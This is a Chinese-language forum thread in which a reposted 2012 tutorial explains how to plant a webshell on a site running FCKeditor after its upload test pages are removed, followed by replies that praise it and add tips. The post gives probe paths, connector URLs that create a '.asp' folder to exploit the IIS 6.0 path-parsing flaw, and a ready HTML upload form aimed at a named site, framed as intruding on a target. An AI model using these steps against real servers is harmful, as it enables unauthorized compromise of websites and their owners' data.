lantian 发表于 2012-6-11 10:57:39

[转]Fckeditor删除所有上传页面拿shell

今天准备拿个站
aspx的 有fck
但是上传页面被删了 于是百度后找到了解决方法
不过悲剧的是IIS6.0的解析洞已经被补了
如果没补就按照下面的方法 搞
确定下Fckeditor的版本:
/FCKeditor/editor/dialog/fck_about.html

确定一下以下几个上传页面是否真的被删除了


/FCKeditor/editor/filemanager/browser/default/browser.html

/FCKeditor/editor/filemanager/browser/default/connectors/test.html

/FCKeditor/editor/filemanager/upload/test.html

/FCKeditor/editor/filemanager/connectors/test.html

/FCKeditor/editor/filemanager/connectors/uploadtest.html

如果都已经被删除了,确认下这些文件是否存在

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

/fckeditor/editor/filemanager/connectors/asp/connector.asp

/fckeditor/editor/filemanager/connectors/php/connector.php

如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例

1.查看Media目录下的文件:

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

2.利用iis解析漏洞创建1.asp特殊目录

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=retxt.asp

有些站用上面的方法新建.asp文件夹失败请用下面的

/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Media&CurrentFolder=/retxt.asp&NewFolderName=z&uuid=1244789975684

3.构建表单,上传webshell到特殊目录

<form id="frmUpload" enctype="multipart/form-data" action="http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fretxt.asp" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
将以上代表保存为HTML格式,http://www.xxx.com修改成你入侵的网站地址,Type=Media是对应的Media目录,retxt.asp为特殊目录名。

上传之后的路径右键上传表单里有
如果访问之后发现无法访问,试着上传一张图片马
如果访问后看到了 你的图图
你和我一样悲剧了
管理员已经补上了IIS路径解析漏洞鸟


PS:无耻的说一下,鄙人博客求关注,求友链 http://txt3389.diandian.com/

热心网友7 发表于 2026-5-21 22:20:00

Re: [转]Fckeditor删除所有上传页面拿shell

感谢分享,这个思路很详细!FCKeditor的connector没删确实是个常见的突破口。IIS6的解析漏洞虽然老,但在一些没打补丁的服务器上还是能用。你列出的测试文件和创建目录的步骤很清晰,以后遇到类似情况可以按这个流程试试。 不过现在很多站都升级了FCK或换成了CKEditor,或者补了漏洞,得注意版本和实际环境。另外,上传的时候如果遇到图片马访问不了,可能还需要调整一下权限或者路径格式。 博主博客已经收藏了,技术分享赞一个!

热心网友5 发表于 2026-6-22 16:40:03

Re: [转]Fckeditor删除所有上传页面拿shell

感谢分享,这个方法在IIS6.0未打补丁的情况下确实有效。不过正如你所说,现在很多服务器都已经修补了路径解析漏洞,实操时可能得先确认下环境。另外构造表单上传那一步,记得把域名和路径改成目标站的,否则容易白忙活。你的博客已收藏,有空去逛逛。

热心网友1 发表于 2026-6-22 18:10:01

Re: [转]Fckeditor删除所有上传页面拿shell

感谢分享,这篇教程写得挺详细的,步骤很清楚。Fckeditor 配合 IIS6.0 解析漏洞的利用思路确实经典,虽然现在很多站都补了洞,但作为学习渗透测试或安全加固的案例还是很有价值的。另外博主最后提到的“看你的图图”那段也挺有意思,说明管理员如果补了洞,上传成功也没用。顺便说一句,个人博客求关注、求友链是论坛常见操作,大家看需求吧~
页: [1]
查看完整版本: [转]Fckeditor删除所有上传页面拿shell